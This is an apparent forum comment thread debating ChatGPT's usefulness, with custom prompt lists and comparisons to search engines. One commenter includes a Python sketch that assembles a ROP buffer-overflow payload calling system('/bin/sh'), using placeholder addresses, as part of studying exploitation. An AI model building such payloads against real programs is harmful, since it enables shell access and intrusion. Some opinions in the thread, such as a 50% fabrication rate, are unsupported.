This is the reason I’ve deliberately customized GPT with the following prompts:
User expects correction if words or phrases are used incorrectly.
Tell it straight—no sugar-coating.
Stay skeptical and question things.
Keep a forward-thinking mindset.
User values deep, rational argumentation.
Ensure reasoning is solid and well-supported.
User expects brutal honesty.
Challenge weak or harmful ideas directly, no holds barred.
User prefers directness.
Point out flaws and errors immediately, without hesitation.
User appreciates when assumptions are challenged.
If something lacks support, dig deeper and challenge it.
I suggest copying these prompts into your own settings if you use GPT or other glorified chatbots.
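If you use a model through an API rather than the web UI, the same directives can be supplied as a system message. A minimal sketch, assuming the common chat-completion message format; the directive wording below is paraphrased for illustration and no actual API call is made:

```python
# Sketch only: packaging directives like the ones above as a "system"
# message in the common chat-completion format. No provider call is made;
# the directive wording is illustrative, not an exact copy of the list above.
DIRECTIVES = [
    "Correct the user when words or phrases are used incorrectly.",
    "Tell it straight, no sugar-coating.",
    "Stay skeptical and question claims.",
    "Point out flaws, weak arguments, and unsupported assumptions directly.",
]

def build_messages(user_prompt: str) -> list[dict]:
    """Assemble a messages list with the directives as the system prompt."""
    return [
        {"role": "system", "content": "\n".join(DIRECTIVES)},
        {"role": "user", "content": user_prompt},
    ]

msgs = build_messages("Critique the reasoning in my last paragraph.")
print(msgs[0]["role"])  # system
```

The same structure works in the web UI’s custom-instructions box: everything in the system message applies to every subsequent reply.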
I’m not saying these prompts won’t help, they probably will. But the notion that ChatGPT has any concept of “truth” is misleading. ChatGPT is a statistical language machine. It cannot evaluate truth. Period.
What makes you think humans are better at evaluating truth? Most people can’t even define what they mean by “truth,” let alone apply epistemic rigor. ChatGPT is more consistent, less biased, and applies reasoning patterns that outperform the average human by miles.
Epistemology isn’t some mystical art; it’s a structured method for assessing belief and justification, and large models approximate it surprisingly well. Sure, it doesn’t “understand” truth in the human sense, but it does evaluate claims against internalized patterns of logic, evidence, and coherence based on a massive corpus of human discourse. That’s more than most people manage in a Facebook argument.
So yes, it can evaluate truth. Not perfectly, but often better than the average person.
I prefer reading. Wikipedia is great. DuckDuckGo still gives pretty good results with the AI off. YouTube is filled with tutorials too. Pre-AI cookbooks are plentiful. And there are these things called newspapers; they aren’t what they used to be, but you even get a choice of which one to buy.
I’ve no idea what a chatbot could help me with. And I think anybody who does need help with something could go learn about whatever they need in pretty short order if they wanted, and do a better job.
I still use Ecosia.org for most of my research on the Internet. It doesn’t need as many resources to fetch information as an AI bot would, plus it helps plant trees around the globe. Seems like a great deal to me.
People always forget about the energy it takes. 10 years ago we were shocked at the energy a Google data center needs to run; now imagine that orders of magnitude larger, and for what?
Well one benefit is finding out what to read. I can ask for the name of a topic I’m describing and go off and research it on my own.
Search engines aren’t great with vague questions.
There’s this thing called using a wide variety of tools to one’s benefit; you should go learn about it.
You search for topics and keywords on search engines. It’s a different skill, and from what I see, it yields better results. If a question is vague, think for a moment first and make it less vague. That goes for life in general!
And a tool which regurgitates rubbish in a verbose manner isn’t a tool. It’s a toy. Toys can spark your curiosity, but you don’t rely on them. Toys look pretty, and can teach you things. The lesson is that they aren’t a replacement for anything but lorem ipsum.
Buddy, that’s great if you know the topic or keyword to search for. If you don’t, and only have a vague query that you’re trying to explore to learn some keywords or topics to search for, you can use AI.
You can grandstand about tools vs. toys and whatever other Luddite shit you want; at the end of the day, despite all your raging, you’re the only one who’s going to miss out, whatever you fanatically tell yourself.
I’m still sceptical, any chance you could share some prompts which illustrate this concept?
Sure. An hour ago I had watched a video about smaller scales and physics below the Planck length. And I was curious: if we can classify smaller scales into conceptual groups, where they interact with physics in their own different ways, what would the opposite end of the spectrum be? From there I was able to ‘chat’ with an AI, then discover and search Wikipedia for terms such as cosmological horizon, brane cosmology, etc.
In the end there were only theories on higher observable magnitudes, but it was a fun rabbit hole I could not have explored through traditional search engines - especially not the gimped, product-driven AdSense shit we have today.
Remember how people used to say you can’t use Wikipedia, it’s unreliable? We would roll our eyes and say, “yeah, but we scroll down to the references and use them to find source material.” Same with LLMs: you sort through the output to get the information you need to get the information you need.
Wikipedia isn’t to be referenced for scientific papers, I’m sure we all agree there. But it does do almost exactly what you described. https://en.m.wikipedia.org/wiki/Shape_of_the_universe has some great further reading links. https://en.m.wikipedia.org/wiki/Cosmology has some great reads too. And for the time short: https://simple.m.wikipedia.org/wiki/Cosmology which also has Related Pages
I’ve still yet to see how AI beats a search engine, and your example hasn’t convinced me either.
If you still can’t see how natural language search is useful, that’s fine. We can, and we’re happy to keep using it.
I often use it to check whether my rationale is correct, or if my opinions are valid.
You do know it can’t reason and literally makes shit up approximately 50% of the time? It’d be quicker to toss a coin!
Actually, given the aforementioned prompts, it’s quite good at discerning flaws in my arguments and logical contradictions.
I’ve also trained its memory not to make assumptions when it comes to contentious topics, and to always source reputable articles and link them to replies.
Yeah this is my experience as well.
People you’re replying to need to stop with the “gippity is bad” nonsense, it’s actually a fucking miracle of technology. You can criticize the carbon footprint of the corpos and the for-profit nature of the endeavour that was ultimately created through taxpayer-funded research at public institutions without shooting yourself in the foot by claiming what is very evidently not true.
In fact, if you haven’t found a use for a gippity type chatbot thing, it speaks a lot more about you and the fact you probably don’t do anything that complicated in your life where this would give you genuine value.
The article in OP also demonstrates how it could be used by the deranged/unintelligent for bad ends as well, so maybe it’s like a Dunning-Kruger curve.
God that’s arrogant.
I know, and that’s fair. But am I wrong? That’s what matters more than anything else.
I make a lot of bold statements on this account, but I never do so lightly or unthinkingly.
Granted, it is flaky unless you’ve configured it not to be a shit cunt. Before I manually set these prompts and memory references, it talked shit all the time.
Given your prompts, maybe you’re good at discerning flaws and analysing your own arguments too.
I’m good enough at noticing my own flaws, as not to be arrogant enough to believe I’m immune from making mistakes :p
💯
I have yet to see people using chatbots for anything actually useful day to day. You can search anything with a “normal” search engine, phrase your searches as questions (or “prompts”), and get better answers that aren’t smarmy.
Also think of the orders of magnitude more energy AI sucks up, compared to web search.
Okay, challenge accepted.
I use it to troubleshoot my own code when I’m dealing with something obscure and I’m at my wit’s end. There’s a good chance it will spit out complete nonsense, like calling functions with parameters that don’t exist, but it can also sometimes make halfway decent suggestions that you just won’t find on a modern search engine in any reasonable amount of time, or that I would never have guessed to even look for due to assumptions made in the docs of a library or some such.
It’s also helpful for explaining complex concepts by creating the examples you want. For instance, I was studying basic buffer overflows and wanted to see what I should expect the stack to look like in GDB’s examine-memory view for a correct ROP chain to accomplish what I was trying to do - something no tutorial ever bothered to show. Gippity generated it correctly, same as I had it at the time, and even suggested something that in the end made it actually work (putting a ret gadget directly after the overflow to get rid of any garbage in the stack frame).
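To make that ret-gadget trick concrete, here’s a rough sketch of how such an x86-64 payload gets assembled. Every address and the 40-byte offset below are invented placeholders; real values come from disassembling the actual target binary (e.g. with ROPgadget or ropper).

```python
import struct

# Hypothetical addresses for illustration only -- real ones come from
# the target binary. The lone `ret` gadget right after the overflow
# realigns the stack / discards leftover junk before the chain proper.
RET_GADGET = 0x401016   # ret
POP_RDI    = 0x401263   # pop rdi; ret
BIN_SH     = 0x404050   # address of a "/bin/sh" string
SYSTEM_PLT = 0x401040   # system@plt

OFFSET = 40  # assumed bytes from buffer start to the saved return address

def p64(addr: int) -> bytes:
    """Pack an address as a little-endian 64-bit word."""
    return struct.pack("<Q", addr)

payload  = b"A" * OFFSET      # filler up to the saved return address
payload += p64(RET_GADGET)    # lone ret: the alignment/cleanup trick
payload += p64(POP_RDI)       # pop rdi; ret
payload += p64(BIN_SH)        # rdi = "/bin/sh"
payload += p64(SYSTEM_PLT)    # call system("/bin/sh")

print(len(payload))  # 72
```

In GDB, `x/12gx $rsp` right after the overflowed function’s `ret` would show these 8-byte words laid out in order, which is exactly the view the tutorials skip.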
It was also much, much faster than watching some greedy time vampire fuck spout off on YouTube in between SponsorBlock skipping his reminders to subscribe and whatnot.
Maybe not an everyday thing, but it’s basically an everyday thing for me, so I tend to use it every day. Being a l33t haxx0r IT analyst schmuck often means I have to be both a generalist and a specialist in every tiny little thing across IT. While studying, there’s nothing better than a machine that’s able to decompress knowledge from its dataset quickly, in the shape best suited to my brain, rather than having to filter so much useless info and outright misinformation from random Medium articles and Stack Overflow posts. Gippity could be wrong too, of course, but it’s just way less to parse, and the odds are definitely in its favour.
YouTube tutorials are for the most part garbage and a waste of your time; they’re created for engagement and milking your money only. The edutainment side of YT, à la Vsauce (pls come back), works as general trivia to ensure a well-rounded worldview, but it’s not gonna make you an expert on any subject. You’re on the right track with reading, but let’s be real, you’re not gonna have much luck learning anything of value in the brainrot that is newspapers and such, beyond cooking or w/e, and who cares about that; I’d rather they teach me how I can never have to eat again, because boy, that shit takes up so much time.
For the most part, I agree. But YouTube is full of gold too. Lots of amateurs making content for themselves. And plenty of newspapers are high quality and worth your time to understand the current environment in which we operate. Don’t let them be your only source of news though, social media and newspapers are both guilty of creating information bubbles. Expand, be open, don’t be tribal.
Don’t use AI. Do your own thinking